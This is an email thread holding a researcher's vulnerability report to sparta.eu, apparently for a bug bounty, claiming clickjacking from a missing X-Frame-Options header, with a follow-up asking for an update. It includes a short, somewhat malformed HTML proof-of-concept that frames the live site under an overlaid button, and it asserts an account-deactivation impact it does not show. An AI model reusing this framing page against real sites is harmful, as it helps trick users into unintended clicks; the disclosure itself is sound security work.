sir any update?

On Sun, Nov 22, 2020 at 8:16 PM Sakshi Patil <sakshipatil017@gmail.com> wrote:
Vulnerability Name : Click jacking

Target URL:https://www.sparta.eu/

Vulnerability Description :
Click jacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

The server didn't return an X-Frame-Options header which means that this website could be at risk of a click jacking attack. The X-Frame-Options HTTP response header can be used to indicate whether or not a browser should be allowed to render a page in a <frame> or <iframe>. Sites can use this to avoid click jacking attacks, by ensuring that their content is not embedded into other sites.

Typically there is one type of attack - cross site request forgeries (CSRF) that can interact with functions on other websites.

1) This vulnerability affects Web Server.
<html>
   <head>
     <title>Clickjack test page</title>
   </head>
   <style>
    #myBtn{
       z-index: 999;
    position: absolute;
    top: 100px;
    right: 50px;
    color: white;
    background-color: red;
    }
    </style>
 <body>
   <!-- <h1> A Sample Test Page </h1>
     <p>Website is vulnerable to click jacking! </p>
    <p>Avoid random clicks </p> -->
<div style="z-index:-9999; position:absolute;top:0; left:0;width: 70%; height:70%">
<iframe src="https://www.sparta.eu/
"frame1"  width="100%"
height="100%" >
</iframe></div>
<div align="right" style="position:absolute; top:1; left:0; z-index:1; width: 70%;height:60%; text-align:left;">

<a href="https://www.sparta.eu/
"target="_blank"><button id="myBtn"> click here</button></a>
"><button id="myBtn">Open Modal</button></a> -->
<div id="myModal" class="modal">
<!-- Modal content -->
 </div>
</body>
</html>

2.save it as <any name>.html eg s.html

3.and just simply open that..and click on button(direct login) its redirect https://www.sparta.eu/
   As far as i know this data is enough to prove that your site is vulnerable to Click jacking.

Impact:
Attacker may tricked user, sending them malicious link then user open it clicked some image and their account unconsciously has been deactivated .

Attachment: